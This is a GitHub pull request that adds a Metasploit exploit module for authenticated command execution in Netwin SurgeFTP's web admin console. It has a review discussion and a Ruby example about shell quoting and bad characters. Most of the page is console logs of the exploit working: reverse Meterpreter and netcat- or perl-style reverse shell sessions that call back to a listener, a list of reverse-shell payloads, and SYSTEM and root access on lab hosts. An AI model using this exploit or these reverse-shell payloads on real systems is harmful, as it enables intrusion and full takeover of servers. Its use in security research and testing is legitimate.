Add Netwin surgeftp exec module #1198
Merged
when 'unix'
  print_status("#{rhost}:#{rport} - Sending payload...")
  http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|)
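Review bot: `"` needs to be declared a bad character for the Unix target before this wrapper is safe. The payload is interpolated into a double-quoted string (`/bin/sh -c "#{payload.encoded}"`), so a `"` inside payload.encoded ends the string early and whatever follows becomes separate shell words; if the admin console passes the string through a shell, `$` and backticks inside the double quotes are also expanded before `/bin/sh -c` ever sees the command. Suggest adding `'Payload' => { 'BadChars' => '"' }` to the Unix target (extending it to `$` and the backtick unless the payload is escaped), or escaping the payload instead of relying on each cmd/unix payload to happen to avoid those characters.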
This makes me think that " should be a badchar for the unix target.
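The quoting problem behind that comment, as an added example that is not code from this PR or from Metasploit: it shows what a POSIX shell makes of the PR's double-quoted wrapper when the payload contains a `"`, what an escaped wrapper does instead, and what the Unix target looks like once bad characters are declared. The payload strings, the helper names, UNIX_BADCHARS and the UNIX_TARGET hash are constructed for illustration; Shellwords stands in for the shell that would parse the wrapper on the target, and ARCH_CMD is a local stand-in for the framework constant.

```ruby
require 'shellwords'

# Characters a POSIX shell keeps interpreting inside a double-quoted string:
# '"' closes the string, '$' and '`' trigger expansion, '\' escapes.
# (Constructed list for this example.)
UNIX_BADCHARS = ['"', '$', '`', '\\'].join.freeze

# Local stand-in for the framework constant of the same name (Rex::Arch::ARCH_CMD).
ARCH_CMD = 'cmd'.freeze

# Hypothetical Unix target entry with the bad characters declared, in the shape
# Metasploit uses for a target's per-payload constraints ('Payload' => {'BadChars' => ...}).
UNIX_TARGET = ['Unix', {
  'Platform' => 'unix',
  'Arch'     => ARCH_CMD,
  'Payload'  => { 'BadChars' => UNIX_BADCHARS }
}].freeze

# How the PR builds the command: the payload is interpolated verbatim into double quotes.
def wrap_double_quoted(cmd)
  %Q|/bin/sh -c "#{cmd}"|
end

# Alternative: backslash-escape every shell metacharacter, so the payload reaches
# /bin/sh -c as one argument whatever it contains.
def wrap_escaped(cmd)
  "/bin/sh -c #{Shellwords.escape(cmd)}"
end

# Bad characters present in cmd (unique, in order of first appearance).
def badchars_in(cmd, badchars = UNIX_BADCHARS)
  cmd.each_char.select { |c| badchars.include?(c) }.uniq
end

# Mirrors the framework's check: a payload is usable for a target only if it
# contains none of the target's declared BadChars.
def payload_allowed?(cmd, target)
  badchars_in(cmd, target[1].dig('Payload', 'BadChars').to_s).empty?
end

# What a POSIX shell would make of the wrapper: Shellwords.split applies sh(1)
# quoting rules, so a stray '"' shows up as a broken argument list.
# Returns nil when the quotes do not even balance.
def shell_argv(wrapper)
  Shellwords.split(wrapper)
rescue ArgumentError
  nil
end

if __FILE__ == $0
  payload = 'echo "hello world"' # constructed payload containing a '"'
  puts "bad chars:     #{badchars_in(payload).inspect}"
  puts "double-quoted: #{shell_argv(wrap_double_quoted(payload)).inspect}"
  puts "escaped:       #{shell_argv(wrap_escaped(payload)).inspect}"
end
```

With the double-quoted wrapper the shell ends up running `sh -c "echo hello"` with `world` as `$0`, which is exactly the silent breakage a BadChars declaration prevents: the framework then refuses (or encodes around) any cmd/unix payload that carries one of the listed characters instead of sending a command that falls apart on the target.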
Tested over windows and linux successfully:

msf exploit(netwin_surgeftp_exec) > show options

Module options (exploit/multi/http/netwin_surgeftp_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         yes       The password for the specified username
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.147    yes       The target address
   RPORT     7021             yes       The target port
   USERNAME  admin            yes       The username with admin role to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(netwin_surgeftp_exec) > set password admin
password => admin
msf exploit(netwin_surgeftp_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] 192.168.1.147:7021 - Sending VBS stager...
[*] Command Stager progress - 0.47% done (499/105503 bytes)
[*] Command Stager progress - 0.95% done (998/105503 bytes)
[*] Command Stager progress - 1.42% done (1497/105503 bytes)
[*] Command Stager progress - 1.89% done (1996/105503 bytes)
...
[*] Command Stager progress - 98.75% done (104187/105503 bytes)
[*] Command Stager progress - 99.20% done (104663/105503 bytes)
[*] Command Stager progress - 99.66% done (105145/105503 bytes)
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Command Stager progress - 100.00% done (105503/105503 bytes)
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:2209) at 2012-12-22 15:39:47 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
msf exploit(netwin_surgeftp_exec) > set rhost 192.168.1.136
rhost => 192.168.1.136
msf exploit(netwin_surgeftp_exec) > set target 1
target => 1
msf exploit(netwin_surgeftp_exec) > show options

Module options (exploit/multi/http/netwin_surgeftp_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin            yes       The password for the specified username
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.136    yes       The target address
   RPORT     7021             yes       The target port
   USERNAME  admin            yes       The username with admin role to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Unix

msf exploit(netwin_surgeftp_exec) > set payload cmd/unix/
set payload cmd/unix/bind_netcat
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_ruby
set payload cmd/unix/bind_netcat_ipv6
set payload cmd/unix/bind_ruby
set payload cmd/unix/reverse
set payload cmd/unix/reverse_perl
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_ruby_ipv6
set payload cmd/unix/reverse_bash
set payload cmd/unix/reverse_python
msf exploit(netwin_surgeftp_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(netwin_surgeftp_exec) > rexploit
[*] Reloading module...
[*] Started reverse double handler
[*] 192.168.1.136:7021 - Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo aRHNJagK8VBaTEWz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "aRHNJagK8VBaTEWz\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.136:34756) at 2012-12-22 15:44:55 +0100

id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 2? [y/N]  y
msf exploit(netwin_surgeftp_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(netwin_surgeftp_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] 192.168.1.136:7021 - Sending payload...
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.136:34761) at 2012-12-22 15:46:57 +0100

id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 3? [y/N]  y
[*] 192.168.1.136 - Command shell session 3 closed.  Reason: User exit

merging!
This is based on Exploit-DB's PoC:
http://www.exploit-db.com/exploits/23522/
EDB hosts the vulnerable Windows version. I also tested the Unix version from the official site, still vulnerable:
http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 or prior. In order to execute commands via the FTP service, please note that you must have valid credentials for the web-based administrative console.
Demo on Windows:
Demo on Ubuntu: